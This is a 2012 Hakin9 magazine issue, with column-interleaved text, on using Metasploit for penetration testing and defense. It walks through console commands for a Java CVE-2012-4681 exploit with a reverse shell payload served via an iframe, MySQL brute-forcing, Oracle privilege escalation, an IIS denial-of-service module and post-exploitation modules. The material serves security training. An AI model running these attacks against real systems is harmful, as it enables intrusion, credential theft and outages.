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09/2012 (13)

Dear Readers,
Metasploit is used to supply its users with information
concerning security vulnerabilities. It is also helpful while
team you conduct penetration testing. Metasploit Framework,
Editor in Chief: Ewa Dudzic which is the main tool used within Metasploit Project,
ewa.dudzic@hakin9.org serves to develop and execute an exploit code against
its target.
Managing Editor: Krzysztof Samborski
Estera Godlewska This issue is concerned solely with Metasploit. We
estera.godlewska@hakin9.org decided to address the topic in response to the rampag-
ing interest in Metasploit that we observed among our
Editorial Advisory Board: Gaereth Watters, John Webb,
Hammad Arshed, Visva Prakash readers.

Proofreaders: Kunal Narsinghani, Jeff Smith, Dan Dieterle While reading this publication you will surely notice
Special thanks to our Beta testers and Proofreaders who helped
that it was divided into four sections, each addressing
us with this issue. Our magazine would not exist without your different issue Defense Pattern, Hakin9 Extra, Network
assistance and expertise. Scanning and Exploring Database. Section number one
describes Metasploit in the papers of Justin C. Klein Ke-
Publisher: Pawe Marciniak
ane, Abhinav Singh and Mike Sheward. Second section
CEO: Ewa Dudzic includes the article by Phillip Wylie, whose publication
ewa.dudzic@hakin9.org is concerned with The Mac OS X Hackers Toolbox. The
Network Scanning section comprises the articles of Mi-
Production Director: Andrzej Kuca
andrzej.kuca@hakin9.org chael Boman. Last but not least, the Exploring Database
DTP: Ireneusz Pogroszewski section includes an article by George Karpouzas.
Art Director: Ireneusz Pogroszewski
We hope that all the articles found in our magazine
are not only informative but also helpful and interesting.
Publisher: Software Press Sp. z o.o. SK
02-682 Warszawa, ul. Bokserska 1
Phone: 1 917 338 3631

Whilst every effort has been made to ensure the highest quality Krzysztof Samborski
of the magazine, the editors make no warranty, expressed
or implied, concerning the results of the contents usage. All
Estera Godlewska
trademarks presented in the magazine were used for informative and Hakin9 Team
purposes only.

All rights to trademarks presented in the magazine are

reserved by the companies which own them.
To create graphs and diagrams we used program

Mathematical formulas created by Design Science MathType

The techniques described in our magazine may be
used in private, local networks only. The editors
hold no responsibility for the misuse of the
techniques presented or any data loss.

4 09/2012
Linux. While this a great option, sometimes it is nice to
DEFENSE PATTERN have your tools running on the native operating system
How to Use Metasploit for Security 06 of you computer.
by Justin C. Klein Keane NETWORK SCANNING
If youve ever taken any training about penetration test- How to Scan with Nessus from within 36
ing, or read almost any book or online article about the Metasploit
trade, youve heard of Metasploit. Years ago, before by Michael Boman
penetration testing was a recognized professional field, When you perform a penetration test with Metasploit
exploiting a vulnerability was often an extremely oner- you sometimes import vulnerability scanning results
ous task. Identifying a vulnerability might be as easy for example Nessus Vulnerability Scanner. Usually you
as fingerprinting a system then searching public mailing start the scan externally from Metasploit framework and
lists, but finding exploit code was often difficult. then import the results into Metasploit. What you can do
is to manage the Nessus scan from within Metasploit
How to Work with Metasploit Auxiliary 12 and easily import the results into your process. But lets
Modules start from the beginning.
by Abhinav Singh
The Metasploit framework is based on a modular ar- How to Use Multiplayer Metasploit with 40
chitecture. This means that all the exploits, payloads, Armitage
encoders etc. are present in the form of modules. The by Michael Boman
biggest advantage of a modular architecture is that it Metasploit is a very cool tool to use in your penetra-
is easier to extend the functionality of the framework tion testing: add Armitage for a really good time. Pen-
based on requirement. Any programmer can develop etration test engagements are more and more often a
his own module and port it easily into the framework. collaborative effort with teams of talented security prac-
titioners rather than a solo effort. Armitage is a script-
How to Explore the IPv6 Attack 22 able red team (that is what the offensive security teams
Surface with Metasploit are called) collaboration tool for Metasploit that visual-
By Mike Sheward izes targets, recommends exploits, and exposes the ad-
IPv6 is often described as a parallel universe, co- vanced post-exploitation features in the framework.
existing alongside existing IPv4 infrastructure in a bid to
ease the transition process. Often left unmanaged and EXPLORING DATABASE
unmonitored in networks, those IPv6 packets could pro- How to use Sqlploit 58
vide a great opportunity for the savvy attacker. Thanks by George Karpouzas
to the Metasploit framework, exploring the IPv6 attack Databases nowadays are everywhere, from the small-
surface has become a lot easier. est desktop applications to the largest web sites such
as Facebook. Critical business information are stored in
HAKIN9 EXTRA database servers that are often poorly secured. Some-
How to Use The Mac OS X Hackers 30 one an to this information could a over a companys or
Toolbox an organizations infrastructure.
By Phillip Wylie, CISSP, IAM
When you think of an operating system to run pen test-
ing tools on, you probably think of Linux and more spe-
cifically BackTrack Linux. BackTrack Linux is a great
option and one of the most common platforms for run-
ning pen testing tools. If you are a Mac user, then you
would most likely run a virtual machine of BackTrack

How to Use Metasploit

for Security Defense

If youve ever taken any training about penetration testing, or read

almost any book or online article about the trade, youve heard of
Metasploit. Years ago, before penetration testing was a recognized
professional field, exploiting a vulnerability was often an extremely
onerous task.

dentifying a vulnerability might be as easy as Metasploit for Defense
fingerprinting a system then searching public Metasploit has long since become the indus-
mailing lists, but finding exploit code was often try standard for offensive security and penetra-
difficult. In many cases, researchers would release tion testing. It is robust, flexible, and reliable, all of
proof of concept exploit code that demonstrated which make it a favorite among practitioners. Us-
a vulnerability, but did little more than launch the ing Metasploit for defensive tasks may seem a little
calc.exe program or other harmless activity. Fur- counter intuitive. Why would a network security en-
thermore, exploit code was often unreliable and gineer, say, be interested in an attack tool? There
required specific environments to build and com- are many good answers to these queries. In this
pile. Thus, a vulnerability tester had to fingerprint article Ill propose rather timely example. Recently,
systems, hunt across the internet and mailing lists Oracles Java implementation was demonstrated
for exploit code, create systems upon which to to have a vulnerability that allowed anyone using
build and compile the code, then execute the code a web browser to be compromised, remotely, sim-
against target systems, and, with fingers crossed ply by viewing a web page (CVE-2012-4681). This
and baited breath, hope that the exploit worked. vulnerability allowed a maliciously crafted Java ap-
The situation was frustrating, and untenable for a plet to compromise the Java Virtual Machine (JVM)
professional class of penetration testers who want- on client machines, and execute arbitrary code as
ed reliable, easy to access, exploit code to use pro- the currently logged on user. This was extreme-
fessionally. Thus, Metasploit was born, as a frame- ly damaging, because at the time the vulnerability
work to support standardized, tested exploit code. became public, there was no supported fix from
With Metasploit, exploit code could be packaged in- Oracle (the flaw was a 0-day, that is a vulnerability
to modules in order to ensure they would work with for which no fix exists). This meant that any attack-
the framework. Users of Metasploit only needed to er leveraging the exploit could take over a victim
ensure that Metasploit itself would run on a system, machine and there was little defenders could do.
and exploits could be crafted for Metasploit, rather In short order a Metasploit module was released.
than having to rely on a testing lab full of machines As expected, there was much wailing and gnash-
of various architectures running several different ing of teeth amongst network security defense
operating systems in order to compile exploit code professionals. When new vulnerabilities become
successfully. With Metasploit, testers could turn to public the first thing organizations usually want
a trusted tool and have confidence that modules in- to measure is their own level of exposure. With-
cluded in the framework would work as advertised. out specific detail it is difficult to justify expense to

6 09/2012
remediate a problem. For instance, with the Java plete versions of Java, Ruby, and PostgreSQL as
vulnerability, would it be worth the effort to craft in- well as Metasploit. These technologies support the
trusion detection alerts so that security staff were framework and the various tools that come with
notified whenever a Java malicious applet was ac- Metasploit. Most of this should occur behind the
cessed, and if so how would one determine how to scenes.
write such a rule. Similarly an organization might
want to decide if they needed to turn off Java in all Installation
web browsers, and how that effort would measure The Metasploit download is fairly straightforward.
against the potential risk. You can install Metasploit on Windows or Linux, or
Knowing the level of exposure and being able to even use it in a pre-configured environment such
concretely address concerns from management as on the BackTrack Linux distribution. For the
about a particular risk is an extremely difficult task purposes of this article well explore installation of
for most defenders. Tools like Metasploit allow de- Metasploit on a Windows XP system as a sort of
fenders to test exploits against their current sys- lowest common denominator. However, using the
tem builds and answer these questions. By using tools in Metasploit that require integration with sep-
a tool that allows defenders to actively gauge the arate technologies (such as Java or PostgreSQL)
effectiveness of countermeasures, the likelihood may be easier with a preconfigured distribution.
of exploit success, and the impact of such an ex- To get started point a browser at the Metasploit
ploit can help organizations craft measured, effec- website (http://www.metasploit.com), navigate to
tive responses to vulnerability announcements like the download section, and choose the version of
CVE-2012-4681. Metasploit that fits your operating system (Figure 1).
Once the download is complete be aware that you
Getting Started with Metasploit may get a number of warnings about Metasploit from
Metasploit is a rather large and complex software your browser, operating system, and/or anti-virus
program. It contains a number of tools and can software. Metasploit contains exploit code, by defi-
be extremely intimidating for a beginner. It is not nition it is hostile, so your machine is right to identify
a tool that is inviting to the casual user in order to this code as malicious. If you dont get any warnings
develop familiarity. Rather, operators must under- that is likely an indication that your computers de-
stand Metasploit, its proper use, capabilities, and fenses may need a little attention (Figure 2).
limitations, in order to get maximum value from the Open the downloaded installer and run it on your
framework. machine. You may need to add an exception to your
Getting started with Metasploit begins with
downloading the latest version of the framework
from Metasploit.com. There are two versions avail-
able, a free and a commercial version. Metasploit
was completely free and open source until it was
acquired by Rapid7, which then began offering a
commercial version of the tool with extended capa-
bilities and support. The free version remains the
flagship, however, so there is no need to fear that
using the free version will somehow hamper test-
ing capabilities. The commercial version includes
extra features for enterprises, so if you plan to use
Metasploit on any sort of regular basis it is worth

Metasploit is a complete framework, programmed
Figure 1. The Metasploit download site
in Ruby. Dont worry if you dont know how to pro-
gram, or how to code in Ruby, the framework takes
care of most of the common tasks most testers
would be interested in.
Metasploit includes a number of additional tools
in addition to the framework itself. Youll notice if
you look in the install directory that there are com- Figure 2. Installation warning of exploits

www.hakin9.org/en 7
anti-virus software to exclude the Metasploit installa- is the console, which you can find under Start ->
tion directory (C:\metasploit) in order for the install to Metasploit -> Metasploit Console. This is the com-
complete. Similarly, you may get warnings that your mand line tool that you use to interact with the
machines firewall could interfere with the operation framework. The other two common ways to con-
of Metasploit. This is mainly due to the fact that ma- nect are Armitage, which is a Java based GUI tool
ny Metasploit payloads require that targets be able for using Metasploit, MSFGUI, and the Web UI.
to connect back to your machine. Careful manipu- I have found that the console is by far the most
lation of your firewall to allow these ports is a wiser direct, efficient, and reliable way to interact with
approach than disabling the firewall entirely, but be Metasploit. In fact, some exploits that seem to
aware that this could cause issues. Once you have work perfectly in the console have not functioned
stepped through any warnings begin the installer. In- properly when started from the Web UI (such as
stallation will require you to accept the license agree- the Java CVE-2012-4681 exploit) (Figure 4).
ment, decide on an installation directory, choose an Once installed, Metasploit can be utilized in a
SSL port on which to serve Metasploit, decide on a number of ways. The most direct way to interact
name for the server and the servers certificate vali- with Metasploit is via the command line, using the
dation timespan. In most cases the default options msfconsole. The console can be intimidating for
for the installation are sufficient (Figure 3). novice users, but it exposes all of the power and
capabilities of the Metasploit framework, so it is
Up and Running worth exploring in order to develop proficiency.
There are several common ways to interact with
the framework, all included in the install. The first Getting Started
Getting started with the Metasploit Console can
be somewhat perplexing. There is no easy way
to navigate other than by using text based com-
mands and some commands are extremely clunky
(for instance, some commands might produce a
large volume of output that will flash by the screen,
but the scroll history of the Console wont let you
scroll up and actually see all the output). Despite
these shortcomings, the full power and flexibility
of Metsaploit is available from the Console, so de-
veloping proficiency is time well spent. It is worth
being aware that this may take some investment,
however, to avoid initial frustration and fatigue with
the tool.
Before you get started with the Console it is im-
portant to make sure that you update Metasploit so
Figure 3. Metasploit installing
that youre using the latest version of the framework

Figure 4. The Metasploit console Figure 5. Metasploit update downloads new modules

8 09/2012
with the newest exploits. The installer download- Crafting the Exploit
ed from the website may not include recently re- To begin building our exploit well have to tell
leased exploit modules. The update program can Metasploit which module to use. To do this simply
be found under Start -> Metasploit -> Framework type use followed by the name of the exploit (re-
-> Framework Update. This will open a console member, you can type help use to get an example
window and check for the newest version of the of how to execute the use command). In this case
software (Figure 5). well type in use exploit/multi/browser/java_jre17_
Once youre sure your version of the framework exec in order to start using the exploit. Youll notice
is up to date you can get started with the Console. that the Console prompt changes so that you know
The first command that you should learn in the which exploit youre using (Figure 8).
Console is the help command. This will list out all Now that were using the desired exploit we have
of the commands that you can use in the console. to provide instructions for Metasploit to craft our
There are quite a number of commands. To get malicious payload. So far Metasploit knows we
more information about a command you can type want to use the Java 1.7 vulnerability to craft an
help followed by the command youre interested exploit, but once Metasploit takes advantage of the
in (such as help banner) (Figure 6). vulnerability it needs to understand what instruc-
To find exploits youll need to utilize the search tions we want to execute on the victim computer.
command. To list all the exploit modules in Metasploit For this example, we will create a payload that
you can simply type show, but as mentioned be- spawns a reverse shell. A reverse shell is a com-
fore, this is of little use since the Console will dis- mand prompt that we can access locally, but which
play far too many modules for the interface to actu- actually executes commands on the target system.
ally display. Instead, try using the search command We can choose a number of payloads that we can
and searching for Java vulnerabilities by typing explore using the show payloads command.
search java. Youll notice that even just searching To select the payload type in set PAYLOAD java/
for this one phrase lists quite a number of results. shell/reverse_tcp and hit enter. This will set up a
When searching for Java modules one also quick- payload in the applet that will execute and shov-
ly notices that there are different types of modules el a shell over TCP back to our machine. In order
listed auxiliary, exploit, and payload. Well be in- for the payload to work we need to tell Metasploit
terested in the exploit modules in order to craft a the IP address of the machine to connect back to.
malicious Java applet, and the payload modules to To do this type in set LHOST [ip_address] where
craft our malware payload that will execute when- [ip_address] is the IP of your machine. Once this
ever a vulnerable machine accesses the applet. To information is entered were ready to begin. Simply
search for exploits specific to the vulnerability we type in exploit to start the exploit (which spawns
want to test type search cve:2012-4681. Alterna- a web server listening at a specific URL detailed
tively you can use the Metasploit website to search
for exploits and find useful descriptions, including
usage documentation at http://www.metasploit.
com/modules (Figure 7).

Figure 7. Using the Metasploit Console search command

Figure 8. Metasploit Console prompt changes to show the

Figure 6. Metasploit Console help command exploit

www.hakin9.org/en 9
in the Console output that will deliver our payload can be further hidden by obfuscating the reference
when accessed) (Figure 9). using JavaScript and functions that encode and
decode data so that anyone observing the HTML
Testing the Exploit source code of an infected web page would see
Setting up a test machine may be a little tricky. nothing but gibberish code that web browsers can
Youll have to ensure that Java is installed on the easily decode and execute but which is more diffi-
machine, but you need an older, vulnerable ver- cult for human eyes to parse (Figure 10).
sion. Older versions of Java are available from Or- Calling the URL from your test machine should
acle, for testing purposes. You can find older ver- only result in a blank screen (or in this case a warn-
sions at http://www.oracle.com/technetwork/java/ ing that the Java plugin is out of date, which, kudos
archive-139210.html or generally looking for Java to Oracle, should nag most users into updating).
Downloads and then following the link to Previ- The only indication that the exploit has been suc-
ous Releases. Using Java 1.7.0_6 should be suf- cessful will appear in the Metasploit Console (Fig-
ficient. To determine the version of Java you have ure 11).
installed type java -version at the command line. Once you see the indication that the stage has
In your test machine, pull up a web browser and been sent you can check to see if a session is avail-
type in the address of the Metasploit server. This is able. To do this, in the Console, hit enter to get back
a somewhat contrived way to access the malicious to a prompt. Next, type in sessions to see the ac-
applet. In the wild, applets such as this are gener- tive sessions that are available. You should see an
ally included in hidden iframe tags that are inserted indication that the reverse shell is up and listening.
into otherwise innocuous web pages. The exploit

Figure 11. Metasploit console shows the target has been

Figure 9. Metasploit exploit started exploited

Figure 10. Vulnerable machine being exploited via malicious Figure 12. Metasploit shows the actively exploited machines
Java applet as sessions

10 09/2012
Note the Id of the session, as you need this infor- Conclusions
mation to connect to the session (Figure 12). The ability to test exploits against systems in your
Once a session is established we can interact environment is a tremendous advantage. Using
with the session by typing in sessions -i [id] where Metasploit you can easily, and extremely accurate-
[id] is the id number noted previously. There are a ly gauge your exposure to compromise. The Java
number of session commands that you can explore 1.7 vulnerability (CVE-2012-4681) is just one ex-
using the help sessions command. As soon as you ample. Metasploit includes hundreds of modules,
enter interactive mode youll notice the command including some that will test misconfiguration in ad-
prompt will change to the familiar MS-DOS prompt dition to vulnerabilities. There are modules that will
and you can type commands as though you were perform brute force attacks to do things like test
logged into the target computer (Figure 13). the strength of passwords on your SQL servers in
addition to target enumeration modules that will
Production Use perform ping sweeps, find hosts on your network
Establishing a proof of concept is useful in confirm- vulnerable to idle scanning, and more.
ing that your Metasploit exploit will actually work. Hopefully this brief tutorial has convinced you
Putting it into practice in the wild is the next step. that Metasploit has value to system defenders as
Youll want to have Metasploit installed on a ma- well as penetration testers. Simulating an attack is
chine that is accessible in your environment, and a great way to expose vulnerabilities in your net-
then start up the exploit so it is serving from the works, but its also a good way to test defensive
server. Next, placing a reference to the Metasploit countermeasures. Using a tool like Metasploit, de-
applet in an iFrame on an intranet site or other fenders can test the value of defenses and deploy
page that you know users in your environment will them with confidence. It will also allow defenders
access will allow you to test infection rates. Check- to speak about the likelihood of specific types of
ing the console periodically will allow you to see attacks penetrating defenses and compromising
IP addresses of users who are vulnerable to the systems. Additionally, using Metasploit, defenders
exploit. can footprint attacks and identify patterns that re-
A better plan is to simply observe what configura- sult from various classes of attacks, and tune not
tions fall victim to the Metasploit exploit and what only their prevention countermeasures, but also
configurations do not, then adjust your produc- their detection measures (could your network spot
tion systems to protect them. Many antivirus prod- a reverse shell spawning from one of the internal
ucts will detect the Metasploit payload and stop it, workstations?). For all of these reasons Metasploit
which is reassuring in that you can be confident should definitely be a part of any internal security
that your AV solution will detect Metasploit attacks. teams toolkit.
A better solution is a configuration that denies Java
from actually attempting to execute the malicious
applet. For instance, white listing sites upon which
Java can execute can greatly limit scope.

Justin C. Klein Keane

Justin C. Klein Keane is an information
security specialist working at the Uni-
versity of Pennsylvania. Mr. Klein Keane
holds a Masters degree in Computers and
Information Technology and is an ac-
complished security researcher. Mr. Klein
Keane prefers to work with open source
technologies and has made numerous contributions
to the open source community in the form of vulner-
ability reports, most notably for the open source con-
tent management system Drupal. Mr. Klein Keanes per-
forms penetration testing and proof of concept exploi-
tation frequently and regularly uses Metasploit to accu-
rately model organizational risk in the face of emerging
Figure 13. Using Metasploit to type commands on the threats. Mr. Klein Keane writes irregularly for his web-
exploited target site www.MadIrish.net.

www.hakin9.org/en 11

How to Work with

Metasploit Auxiliary Modules

The Metasploit framework is based on a modular architecture. This

means that all the exploits, payloads, encoders etc. are present in the
form of modules. The biggest advantage of a modular architecture
is that it is easier to extend the functionality of the framework based
on requirement.

ny programmer can develop his own mod- penetration testing scenarios. Let us start with a
ule and port it easily into the framework. basic HTTP scanner. You will see that there are
Even though modules are not very much lots of different HTTP scan options available. We
talked about while working with metasploit, but will discuss few of them here.
they form the crux of the framework so it is essen- Consider the dir_scanner script. This will scan
tial to have a deep understanding of it. a single host or a complete range of network to
In this tutorial we will particularly focus on / look for interesting directory listings that can be
framework3/modules directory which contains a further explored to gather information.
complete list of useful modules which can ease To start using an auxiliary module, we will have
up our task of penetration testing. Later in the to perform following steps in our msfconsole:
chapter we will also analyse some of the exist-
ing modules and finally conclude the discussion msf > use auxiliary/scanner/http/dir_scanner
by learning how to develop our own modules for msf auxiliary(dir_scanner) > show options
metasploit. So let us start our experiments with
modules. Module options:
The show options command will list all the
Working with Scanner Modules available optional parameters that you can pass
Let us begin our experimentation with scanner along with the scanner module. The most im-
modules. We will start with scanning modules portant one is the RHOSTS parameter which
which ships with the framework. Even though will help us in targeting either a single user or a
nmap is a powerful scanning tool but still there can range of hosts.
be situations where we have to perform a specific Let us discuss a specific scanner module in-
type of scan like scanning for presence of mysql volving some extra inputs. The mysql_login scan-
database etc. ner module is a brute force module which scans
Metasploit provides us a complete list of such for the availability of Mysql server on the target
useful scanners. Let us move ahead and practi- and tries to login to the database by brute force
cally implement some of them. To find the list of attacking it.
available scanners we can browse to /framework3/
modules/auxiliary/scanner. msf > use auxiliary/scanner/mysql/mysql_login
You can find a collection of more than 35 useful msf auxiliary(mysql_login) > show options
scan modules which can be used under various

12 09/2012
Module options (auxiliary/scanner/mysql/mysql A lot of automated brute force modules have been
_ login):Listing 1. developed to break weak passwords.
AS you can see there are lots of different param-
eters that we can pass to this module. The better Working With Admin Auxiliary modules
we leverage the powers of a module, the greater Moving ahead with our module experiment, we will
are our chances of successful penetration testing. learn about some admin modules which can be re-
We can provide a complete list of username and ally handy during penetration testing. The admin
password which the module can use and try on the modules can serve different purposes like it can
target machine. Let us provide this information to look for an admin panel, or it can try for admin login
the module. etc. It depends upon the functionality of the mod-
ule. Here we will look at a simple admin auxiliary
msf auxiliary(mysql_login) > set USER_FILE /users.txt module called mysql_enum module.
USER_FILE => /users.txt The mysql_enum module is a special utility mod-
msf auxiliary(mysql_login) > set PASS_FILE /pass.txt ule for mysql database servers. This module pro-
PASS_FILE => /pass.txt vides simple enumeration of mysql databse serv-
er provided proper credentials are provided to
Now we are ready to brute force. The last step will connect remotely. Let us understand it in detail
be selecting the target and provide the run com- by using the module. We will start with launching
mand to execute the module (Listing 2). the msfconsole and providing the path for auxil-
The output shows that the module starts the iary module.
process by first looking for the presence of mysql
server on the target. Once it has figured out, it msf > use auxiliary/admin/mysql/mysql_enum
starts trying for the combinations of usernames msf auxiliary(mysql_enum) > show options
and password provided to it through external text
file. This is also one of the most widely used mod- Module options (auxiliary/admin/mysql/mysql _
ular operations of metasploit in current scenario. enum):

Listing 1. Module options

Name Current Setting Required Description

---- --------------- -------- -----------
BLANK_PASSWORDS true yes Try blank pas..
BRUTEFORCE_SPEED 5 yes How fast to..
PASSWORD no A specific password
PASS_FILE no File containing..
RHOSTS yes The target address.
RPORT 3306 yes The target port..
STOP_ON_SUCCESS false yes Stop guessing
THREADS 1 yes The number of..
USERNAME no A specific user..
USERPASS_FILE no File containing..
USER_FILE no File containing..
VERBOSE true yes Whether to print..

Listing 2. Running a command to execute the module

msf auxiliary(mysql_login) > set RHOSTS

msf auxiliary(mysql_login) > run

[*] - Found remote MySQL version 5.0.51a

[*] Trying username:administrator with password:

www.hakin9.org/en 13
Name Current Setting Required Description msf auxiliary(dbms_metadata_get_xml) > show
---- -------------- ------- ----------- options
PASSWORD no The password for the..
RHOST yes The target address Module options (auxiliary/sqli/oracle/dbms _
RPORT 3306 yes The target port metadata _ get _ xml):
USERNAME no The username to..
Name Current Setting Required Description
As you can see that the modules accepts pass- ---- ------------ -------- -----------
word, username and RHOST as parameters. This DBPASS TIGER yes The password to..
can help the module in first searching for the exis- DBUSER SCOTT yes The username to..
tence of a mysql database and then apply the cre- RHOST yes The Oracle host.
dentials to try for remote login. There are sever- RPORT 1521 yes The TNS port.
al similar modules available for other services like SID ORCL yes The sid to
MSSQL, Apache etc. The working process is sim- authenticate.
ilar for most of the modules. Remember to use SQL GRANT DBA to SCOTT no SQL to execute.
the show options command in order to make sure
that you are passing the required parameters to The module requests for similar parameters which
the module. we have seen so far. The database first checks
to login by using the default login credentials ie,
SQL Injection and DOS attack modules SCOTT and TIGER as the default username
Metasploit is friendly for both penetration testers and password respectively. This enables a DB_
as well as hackers. The reason for this is that a User level login. Once the modules gains log-
penetration tester has to think from hackers per- in as a database user, it then executes the exploit
spective in order to secure the network. The SQL to escalate the privilege to the database adminis-
injection and DOS modules help penetration tes- trator. Let us execute the module as a test run on
ters in attacking their own services in order to fig- our target.
ure out if they are susceptible to such attacks. So
lets discuss some of these modules in detail. The msf auxiliary(dbms_metadata_get_xml) > set RHOST
SQL injection modules use a known vulnerability
in the database type to exploit it and provide un- msf auxiliary(dbms_metadata_get_xml) > set SQL YES
authorized access. The modules can be found in msf auxiliary(dbms_metadata_get_xml) > run
Let us analyse an oracle vulnerability called Or- On successful execution of module, the user priv-
acle DBMS_METADATA XML vulnerability. This vulner- ilege will be escalated from DB _ USER to DB _
ability will escalate the privilege from DB_USER to ADMINISTRATOR.
DBA (Database Administrator). We will be using The next module we will cover is related to De-
the dbms_metadata_get_xml module. nial Of Service (DOS) attack. We will analyze a

Listing 3. Module options

Name Current Setting Required Description

---- --------------- -------- -----------
RHOST yes The target address
RPORT 80 yes The target port
URI /page.asp yes URI to request
VHOST no The virtual host name to..

msf auxiliary(ms10_065_ii6_asp_dos) > set RHOST

msf auxiliary(ms10_065_ii6_asp_dos) > run

[*] Attacking

14 09/2012
simple IIS 6.0 vulnerability which allows the at- Post Exploitation Modules
tacker to crash the server by sending a POST We also have a separate dedicated list of modules
request containing more than 40000 request that can enhance our post-exploitation penetration
parameters. We will analyze the vulnerability testing experience. Since they are post exploita-
shortly. This module has been tested on an un- tion modules so we will need an active session
patched Windows 2003 server running IIS 6.0. with our target. Here we are using an unpatched
The module we will be using is ms10_065_ii6_ Windows 7 machine as our target with an active
asp_dos. meterpreter session.
You can locate the post modules in modules/
msf > use auxiliary/dos/windows/http/ms10_065_ii6_ post/windows/gather. Let us start with a simple
asp_dos enum_logged_on_users module. This post module
msf auxiliary(ms10_065_ii6_asp_dos) > show options will list the current logged in users in the windows
Module options (auxiliary/dos/windows/http/ We will execute the module through our active
ms10 _ 065 _ ii6 _ asp _ dos): Listing 3. meterpreter session. Also keep in mind to escalate
Once the module is executed using the run com- the privilege using getsystem command in order
mand, it will start attacking the target IIS server to avoid any errors during the execution of module
by sending HTTP request on port 80 with URI as (Listing 4).
page.asp. Successful execution of the module Successful execution of module shows us two
will lead to complete denial of service of the IIS tables. The first table reflects the currently logged
server. on user and the second table reflects the recently

Listing 4. The Osage of getsystem command

meterpreter > getsystem

...got system (via technique 4).

meterpreter > run post/windows/gather/enum_logged_on_users

[*] Running against session 1

Current Logged Users


SID User
--- ----
S-1-5-21-2350281388-457184790-407941598 DARKLORD-PC\DARKLORD

Recently Logged Users


SID Profile Path

--- ------------
S-1-5-18 %systemroot%\system32\config\systemprofile
S-1-5-19 C:\Windows\ServiceProfiles\LocalService
S-1-5-20 C:\Windows\ServiceProfiles\NetworkService
S-1-5-21-23502 C:\Users\DARKLORD
S-1-5-21-235 C:\Users\Winuser

www.hakin9.org/en 15
logged on user. Follow the correct path while ex- meterpreter > run post/windows/gather/screen_spy
ecuting the modules. We have used the run com- [*] Migrating to explorer.exe pid: 1104
mand to execute the modules as they are all in [*] Migration successful
form of ruby script so meterpreter can easily iden- [*] Capturing 60 screenshots with a delay of 5
tify it. seconds
Let us take one more example. There is an in-
teresting post module that captures a screen- You might have noticed how easy and useful
shot of the target desktop. This module can be post modules can be. In the coming future, the
useful when we have to know whether there is developers of metasploit will be focusing more
any active user or not. The module we will use is on post modules rather than meterpreter as it
screen_spy.rb. greatly enhances the functionality of penetration

Listing 5. Pulling out the main scan module from the metasploit library

def initialize
Name => TCP Port Scanner,
Version => $Revision$,
Description => Enumerate open TCP services,
Author => [ darklord ],
License => MSF_LICENSE

Listing 6. Modules details



OptString.new(PORTS, [true, Ports to scan (e.g. 25,80,110-900), 1-10000]),

OptInt.new(TIMEOUT, [true, The socket connect timeout in milliseconds, 1000]),

OptInt.new(CONCURRENCY, [true, The number of concurrent ports to check per host, 10]), self.


Listing 7. Storing of the boolean value in res

if res
write_check = send_cmd( [MKD, dir] , true)

if (write_check and write_check =~ /^2/)

send_cmd( [RMD, dir] , true)
access_type = rw

print_status(#{target_host}:#{rport} Anonymous

16 09/2012
testing. So if you are looking to contribute to the ruby to start building modules for the framework.
metasploit community then you can work on post The process is very much similar to meterpret-
modules. er scripting. The difference lies in using a set of
pre-defined scripting lines that will be required
Basics of Module Building in order to make the framework understand the
So far we have seen the utility of modules and the requirements and nature of module. Let us start
power that they can add to the framework. In or- with some of the basics of module building. In or-
der to master the framework it is very essential to der to make our module readable for the frame-
understand the working and building of modules. work we will have to import msf libraries.
This will help us in quickly extending the frame-
work according to our needs. In the next few reci- require msf/core
pes we will see how we can use ruby scripting
to build our own modules and import them into This is the first and foremost line of every script.
the framework. To start building our own module This line tells that the module will include all the
we will need basic knowledge of ruby scripting. dependencies and functionalities of the metasploit
In this discussion we will see how we can use framework.

Listing 8. The result of the operations failure

:host => target_host,
:port => rport,
:sname => ftp,
:user => datastore[FTPUSER],
:pass => datastore[FTPPASS],
:type => password_#{access_type},
:active => true



Listing 9. Importing the Framework libraries

require msf/core
require rex
require msf/core/post/windows/registry

class Metasploit3 < Msf::Post
include Msf::Post::Windows::Registry

def initialize(info={})
super( update_info( info,

Name => Windows Gather Installed Application Enumeration,
Description => %q{ This module will enumerate all installed applications },
License => MSF_LICENSE,
Platform => [ windows ],
SessionTypes => [ meterpreter ]

www.hakin9.org/en 17
class Metasploit3 < Msf::Auxiliary thor, description etc (Listing 6). The next few lines
of the script are used to initialize values for the
This line defines the class which inherits the prop- script. The options which are marked as true are
erties of the Auxiliary family. The Auxiliary module those which are essentially required for the mod-
can import several functionalities like scanning, ules whereas the options marked as false are op-
opening connections, using databse etc. tional. These values can be passed/changed dur-
ing the execution of a module.
include Msf:: The best way to learn about modules is by mas-
tering ruby scripting and by analyzing existing
The include statement can be used to include a modules. Let us analyse a simple module here
particular functionality of the framework into our in order to dive deeper into module building. We
own module. For example, if we are building a will be analyzing ftp anonymous access module.
scanner module then we can include as: You can find the main script at the following lo-
cation: pentest/exploits/framework3/modules/
Include Msf::Exploit::Remote::TCP auxiliary/scanner/ftp/anonymous.rb.
Let us start with the analysis of the main script
This line will include the functionality of a remote body to understand how it works.
TCP scan in the module. This line will pull out the
main scan module libraries from the metasploit li- def run_host(target_host)
brary (Listing 5). begin
The next few lines of script give us an introduc- res = connect_login(true,
tion about the module like its name, version, au- false)

Listing 10. Defining different columns

def app_list
tbl = Rex::Ui::Text::Table.new(
Header => Installed Applications,
Indent => 1,
Columns =>

appkeys = [
apps = []
appkeys.each do |keyx86|
found_keys = registry_enumkeys(keyx86)
if found_keys
found_keys.each do |ak|
apps << keyx86 +\\ + ak

18 09/2012
banner.strip! if banner to us when we use the show options command so
dir = Rex::Text.rand_text_alpha(8) these values are user dependent.
This was a quick demonstration of how a simple
This function is used to begin the connection. The module functions within the framework. You can
res variable holds the Boolean value true or false. change the existing scripts accordingly to meet
The connect _ login function is a specific function your needs. This makes the platform extremely
used by the module to establish a connection with portable to development. As I have said it, the best
the remote host. Depending upon the success or way to learn more about module building is by ana-
failure of connection, the boolean value is stored lyzing the existing scripts.
in res (Listing 7).
Once the connection has been setup, the mod- Building your own Post Exploitation
ule tries to check if the anonymous user has read/ module
write privilege or not. The write_check variable Now we have covered up enough background
checks if a write operation is possible or not. Then about building modules. Here we will see an ex-
it is checked weather the operation succeeded or ample of how we can build our own module and
not. Depending upon the status the privilege mes- add it into the framework. Building modules can be
sage is printed on the screen. If the write operation very handy as it will give us the power of extending
fails then the status is printed as ro or read-only the framework depending on our need.
(Listing 8). Let us build a small post exploitation module
The next function is used to report authorization that will enumerate all the installed applications
info. It reflects important parameters like host, port, on the target machine. Since it is a post exploita-
user, pass etc. These are the values that appear tion module, we will require a compromised target

Listing 11. The enumeration process

t = []
